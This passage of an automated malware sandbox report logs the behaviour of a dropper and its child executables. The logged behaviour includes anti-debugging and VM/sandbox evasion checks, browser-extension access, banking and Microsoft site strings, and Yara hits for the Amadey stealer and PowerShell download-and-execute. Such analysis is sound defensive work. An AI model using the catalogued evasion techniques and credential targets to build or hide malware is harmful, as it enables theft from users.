Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6432 Thread sleep time: -1080000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6432 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C29C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 8_2_6C29C930
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: axplong.exe, axplong.exe, 00000007.00000002.3279862046.000000000113B000.00000040.00000001.01000000.00000007.sdmp, 4065fbc12b.exe, 4065fbc12b.exe, 00000008.00000002.2958060224.0000000000CB5000.00000040.00000001.01000000.00000009.sdmp, 4d1c7345ec.exe, 00000009.00000002.2818859291.0000000000FD4000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 0000000A.00000002.2857462940.0000000001014000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000B.00000002.2864498923.0000000001014000.00000040.00000001.01000000.0000000B.sdmp, 4065fbc12b.exe, 0000000C.00000002.2973592627.0000000000CB5000.00000040.00000001.01000000.00000009.sdmp, 4d1c7345ec.exe, 0000000D.00000002.3050719228.0000000000FD4000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 0000000E.00000002.3083634084.0000000001014000.00000040.00000001.01000000.0000000B.sdmp, 4065fbc12b.exe, 0000000F.00000002.3082004598.0000000000CB5000.00000040.00000001.01000000.00000009.sdmp, 4d1c7345ec.exe, 00000010.00000002.3179259439.0000000000FD4000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: GHCGDAFC.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: GHCGDAFC.8.dr Binary or memory string: discord.comVMware20,11696428655f
Source: GHCGDAFC.8.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: GHCGDAFC.8.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 4065fbc12b.exe, 0000000F.00000002.3083910123.0000000001658000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWo
Source: GHCGDAFC.8.dr Binary or memory string: global block list test formVMware20,11696428655
Source: GHCGDAFC.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: axplong.exe, 00000007.00000002.3282380611.00000000019AA000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000003.2983969975.00000000019DB000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3282380611.00000000019DB000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000003.2983969975.00000000019AA000.00000004.00000020.00020000.00000000.sdmp, 4065fbc12b.exe, 00000008.00000002.2959289490.0000000001622000.00000004.00000020.00020000.00000000.sdmp, 4065fbc12b.exe, 00000008.00000002.2959289490.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, 4065fbc12b.exe, 0000000C.00000002.2975327681.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, 4065fbc12b.exe, 0000000F.00000002.3083910123.000000000162C000.00000004.00000020.00020000.00000000.sdmp, 4065fbc12b.exe, 0000000F.00000002.3083910123.0000000001658000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000011.00000002.3280074194.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000011.00000002.3280074194.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 4065fbc12b.exe, 0000000C.00000002.2975327681.000000000155B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarew
Source: GHCGDAFC.8.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 4065fbc12b.exe, 0000000C.00000002.2975327681.0000000001599000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: GHCGDAFC.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: GHCGDAFC.8.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: GHCGDAFC.8.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: GHCGDAFC.8.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: GHCGDAFC.8.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: GHCGDAFC.8.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: GHCGDAFC.8.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: GHCGDAFC.8.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 4065fbc12b.exe, 0000000C.00000002.2975327681.00000000015C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWc
Source: GHCGDAFC.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: GHCGDAFC.8.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: GHCGDAFC.8.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: GHCGDAFC.8.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: GHCGDAFC.8.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: GHCGDAFC.8.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: skotes.exe, 00000011.00000002.3280074194.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: GHCGDAFC.8.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: skotes.exe, 00000011.00000002.3280074194.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yr
Source: GHCGDAFC.8.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: GHCGDAFC.8.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 4d1c7345ec.exe, 00000010.00000002.3180502795.00000000016D9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: GHCGDAFC.8.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: GHCGDAFC.8.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: GHCGDAFC.8.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 4065fbc12b.exe, 0000000F.00000002.3083910123.00000000015EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: GHCGDAFC.8.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 4065fbc12b.exe, 00000008.00000002.2959289490.0000000001622000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWYE
Source: GHCGDAFC.8.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2090464522.0000000000E8B000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2117217913.000000000113B000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2121653302.000000000113B000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000007.00000002.3279862046.000000000113B000.00000040.00000001.01000000.00000007.sdmp, 4065fbc12b.exe, 00000008.00000002.2958060224.0000000000CB5000.00000040.00000001.01000000.00000009.sdmp, 4d1c7345ec.exe, 00000009.00000002.2818859291.0000000000FD4000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 0000000A.00000002.2857462940.0000000001014000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000B.00000002.2864498923.0000000001014000.00000040.00000001.01000000.0000000B.sdmp, 4065fbc12b.exe, 0000000C.00000002.2973592627.0000000000CB5000.00000040.00000001.01000000.00000009.sdmp, 4d1c7345ec.exe, 0000000D.00000002.3050719228.0000000000FD4000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 0000000E.00000002.3083634084.0000000001014000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: GHCGDAFC.8.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: GHCGDAFC.8.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04E40BDE rdtsc 0_2_04E40BDE
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C2E5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 8_2_6C2E5FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C2EC410 LoadLibraryW,GetProcAddress,FreeLibrary, 8_2_6C2EC410
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_00F7645B mov eax, dword ptr fs:[00000030h] 7_2_00F7645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_00F7A1C2 mov eax, dword ptr fs:[00000030h] 7_2_00F7A1C2
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C2BB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_6C2BB66C
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C2BB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_6C2BB1F7
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C46AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_6C46AC62
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 4065fbc12b.exe PID: 7928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4065fbc12b.exe PID: 7184, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4065fbc12b.exe PID: 2764, type: MEMORYSTR
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe "C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe "C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C4B4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 8_2_6C4B4760
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C391C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 8_2_6C391C30
Source: axplong.exe, axplong.exe, 00000007.00000002.3279862046.000000000113B000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: 6Program Manager
Source: 4d1c7345ec.exe, 00000009.00000002.2818859291.0000000000FD4000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 0000000E.00000002.3083634084.0000000001014000.00000040.00000001.01000000.0000000B.sdmp, 4d1c7345ec.exe, 00000010.00000002.3179259439.0000000000FD4000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: .=%Program Manager
Source: 4065fbc12b.exe, 4065fbc12b.exe, 00000008.00000002.2958060224.0000000000CB5000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: ,Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_00F5D312 cpuid 7_2_00F5D312
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000023001\951fa0b99a.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000023001\951fa0b99a.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_00F5CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 7_2_00F5CB1A
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_00F465B0 LookupAccountNameA, 7_2_00F465B0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3B8390 NSS_GetVersion, 8_2_6C3B8390

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 17.2.skotes.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.4d1c7345ec.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.skotes.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.axplong.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.axplong.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.c90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.axplong.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.skotes.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.skotes.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.4d1c7345ec.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.4d1c7345ec.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000003.3040094573.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2777963498.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.3195900026.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2857252645.0000000000E21000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2075732141.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.3129105672.0000000005320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2864339479.0000000000E21000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3178816106.0000000000DE1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2117145572.0000000000F41000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2813089482.0000000004C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2818754274.0000000000DE1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3279266272.0000000000F41000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
